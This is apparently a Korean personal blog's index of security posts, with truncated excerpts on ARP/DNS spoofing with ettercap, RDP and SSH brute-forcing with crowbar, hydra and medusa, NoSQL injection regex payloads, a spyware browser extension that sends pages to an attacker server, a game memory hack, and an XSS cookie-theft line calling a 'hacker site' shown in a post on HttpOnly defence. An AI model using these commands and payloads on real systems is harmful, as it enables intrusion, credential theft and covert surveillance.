본문 바로가기

Tried. Failed. Logged.

728x90

🔒정보보안122

네트워크 해킹 - ettercap의 arp 스푸핑을 이용해 dns 스푸핑하기 우선 ettercap 켠다. 그리고 eth0에 접근 인터페이스 상단에 보면 돋보기 모양이 있는데 이를 클릭해 주변에 존재하는 호스트들을 잡는다. 그리고 확인된 아이피 어드레스들 중 라우터(공유기)로 추정되는 것은 Target 1으로 지정하고, 스니핑(도청)을 당하고자하는 타겟은 Target 2로 지정 이제 다시 인터페이스에 상단 맨 오른쪽에 지구본 모양이 있는데 이를 클릭해서 ARP poising...을 누른 다음 이런 체크 박스 창이 뜨게되면 사진과 같이 "Sniff remote connections."를 체크하고 OK를 눌러 ARP 스푸핑을 시작한다. 이제 피해자의 PC를 조작한다. cmd에 들어가서 "arp -a"를 실행시켜주게 되면 (ARP 테이블 확인 명령어) 공유기의 물리적 주소가 아래의 다른.. 2021. 12. 22.

네트워크 해킹 - Tor ProxyChains 로컬 프록시 설정 https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663 How to Setup PROXYCHAINS in Kali-Linux by Terminal proxychains is open source software for Linux systems and comes pre-installed with Kali Linux, the tool redirects TCP connections through… medium.com [설치 및 설정] # tor 설치 sudo apt install tor # proxychains 설정 파일 수정하기 sudo vim /etc/proxychains.conf or sudo .. 2021. 12. 15.

네트워크 해킹 - rdp 사전 공격 재택근무가 잦아진 요즘 RDP(Remote Desktop Protocol)를 사용하는 유저들이 꽤나 많아졌다. 이런 시대의 흐름을 맞춰서 RDP를 공격하는 다양한 공격 도구들이 생겨났는데, 그중 하나가 사전 공격을 도와주는 Crowbar가 있다. 도구를 사용하기 이전에 리눅스에 freerdp가 설치되어있어야 함 sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer [사용 명령어] ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist hydra로도 가능하다. [사용 명.. 2021. 12. 14.

모바일 해킹 - class 파일을 디컴파일하여 java 파일 만들기 이전에 적은 글에 이어서 https://janger.tistory.com/146 모바일 해킹 - DEX를 jar로 추출하여 class 파일들 확인하기 DEX를 구하기 위해서는 7-zip을 설치해서 APK를 추출해야 합니다. https://www.7-zip.org/download.html Download Download .7z Any / x86 / x64 LZMA SDK: (C, C++, C#, Java) www.7-zip.org 그 다음 dex 파일을.. janger.tistory.com 이번엔 class 파일들을 이용해 java를 만들고 싶을 경우 우선은 7-zip을 이용해서 APK를 압축 해제하고, dex2jar 도구로 classes-dex2jar.jar를 추출해주었는데 이번에도 이 classes-d.. 2021. 12. 11.

모바일 해킹 - DEX를 jar로 추출하여 class 파일들 확인하기 DEX를 구하기 위해서는 7-zip을 설치해서 APK를 추출해야 합니다. https://www.7-zip.org/download.html Download Download .7z Any / x86 / x64 LZMA SDK: (C, C++, C#, Java) www.7-zip.org 그 다음 dex 파일을 jar로 변환시켜주는 dex2 jar를 설치받습니다. https://github.com/pxb1988/dex2jar GitHub - pxb1988/dex2jar: Tools to work with android .dex and java .class files Tools to work with android .dex and java .class files - GitHub - pxb1988/dex2jar: .. 2021. 12. 11.

모바일 해킹 - 안드로이드 APK 추출 및 분석 우선 APP을 APK로 추출하려면 전용 앱을 설치해야 함 https://play.google.com/store/apps/details?id=com.ext.ui APK Extractor - Google Play 앱 여러분의 기기에 설치된 앱을 SD카드로 추출합니다. play.google.com 그리고 APK를 언패키징 해주는 도구인 apktool를 설치한다. https://ibotpeaches.github.io/Apktool/ Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps. A tool for reverse engineering 3rd party, closed, binary Android apps. It can.. 2021. 12. 11.

웹 해킹 - 웹 패킷 전송 확장 프로그램 https://chrome.google.com/webstore/detail/talend-api-tester-free-ed/aejoelaoggembcahagimdiliamlcdmfm Talend API Tester - Free Edition Visually interact with REST, SOAP and HTTP APIs. chrome.google.com 웹 서버 API를 테스트할 때 도움이 되는 확장 프로그램입니다. 이전까지는 POSTMAN을 주로 사용했는데 이 녀석은 브라우저에서 조작이 가능하며, 심지어 브라우저가 가지고 있는 쿠키 값도 함께 전달이 가능합니다. 페이지에 로그인이 필요한 경우에 아주 편리합니다. 그리고 작성한 요청 정보들을 브라우저에 저장도 할 수 있음. 단점: 시크릿 모드에서 사용.. 2021. 12. 9.

웹 해킹 - NoSQL Injection 조건 표현식 https://book.hacktricks.xyz/pentesting-web/nosql-injection NoSQL injection - HackTricks Brute-force login usernames and passwords from POST login book.hacktricks.xyz [$ne] : 같지 않을 경우(not equals) [$regex] : 정규표현식 [$eq] : 같다(=) [$lt] : 작다() [$lte] : 작거나 같다() $regex로 패스워드 길이 알아내기 "password": {"$regex":".{1}"} => admin "password": {"$regex":".{2}"} => admin ... "password": {"$regex":".{5}"} => admin.. 2021. 12. 9.

웹 해킹 - 크롬 스파이웨어 확장 프로그램 , Bad Extension 크롬 확장자를 이용해 브라우저 전용 스파이웨어를 만들어보았습니다. 우선 대상의 컴퓨터에 설치를 하는 건 상상에 맡기고, 확장 프로그램을 설치하게 되면 별 다른 이상 증상은 없습니다. 확장 프로그램 아이콘을 클릭해도 별 다른 기능은 없습니다. 하지만 만약 유저가 다른 페이지로 이동을 할 경우가 생기면 공격자의 PC에는 유저가 돌아다닌 페이지의 html 파일과 스크린샷 파일을 다운로드 받게 됩니다. 원리: 공격자가 파이썬 Flask로 CDN(콘텐츠 전송 네트워크) 서버를 열게 됩니다. 이 악성 확장 프로그램은 페이지를 이동할 때마다 공격자에게 자바스크립트 콘텐츠 파일을 요구를 하게 되고, 공격자 서버는 콘텐츠를 제공을 하게 됩니다. 그 제공받는 자바스크립트 파일에는 데이터를 전송하는 ajax 스크립트와 문서.. 2021. 12. 8.

게임 해킹 - 피카츄 배구 핵(C) #include #include int make_envincible(HANDLE hProcess) { // 점수 몰빵 LPVOID base = (LPVOID)0x00403C4A; BYTE buffer[4] = {0xFF, 0x46, 0x40, 0x90}; // 1P: 0xFF, 0x46, 0x3C, 0x90 | 2P: 0xFF, 0x46, 0x40, 0x90 BOOL is_successed = WriteProcessMemory(hProcess, base, buffer, 4, NULL); // 엔드리스 게임 base = (LPVOID)0x00403C27; BYTE buffer2[2] = {0x74, 0x76}; is_successed = WriteProcessMemory(hProcess, base, buf.. 2021. 12. 3.

웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly) 해커는 아래처럼 document.cookie를 통해 중요한 쿠키 정보들을 수집하는 게 일반적 location.href = 'http://해커사이트/?cookies=' + document.cookie; 서버가 클라이언트에게 쿠키 값을 지정할 때에 HttpOnly라는 옵션을 추가시켜주면, (HttpOnly가 Http만 허용하고, Https는 허용하지 않는다 이게 아니다..) 클라이언트가 document.cookie를 아무리 출력해 보아도 해당 쿠키에 대한 정보는 출력이 되지 않는다. Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly HttpOnly 설정을 한 쿠키는 브라우저가 접근을 할 수 없도록 되버린 것. 당연히 서버에게 GET, POST 요청등을 할 때에는 HttpOnly 설정된 쿠키.. 2021. 11. 25.

네트워크 해킹 - medua, 무차별 대입 공격 도구 https://www.kali.org/tools/medusa/ medusa | Kali Linux Tools www.kali.org 얘도 hydra과 같은 대입 공격 도구이다. 사용 방법) medusa -h 호스트 -u 유저 -P 사전(passwords.txt) -M 모드(ssh|ftp) ssh 서버를 대상으로 써봤는데 잘 된다. example) medusa -h 192.168.0.5 -u root -p qwer1234 -M ssh medusa -h 192.168.0.5 -u root -P passwords.txt -M ftp 2021. 11. 22.

이전 1 ··· 7 8 9 10 11 다음

728x90

티스토리툴바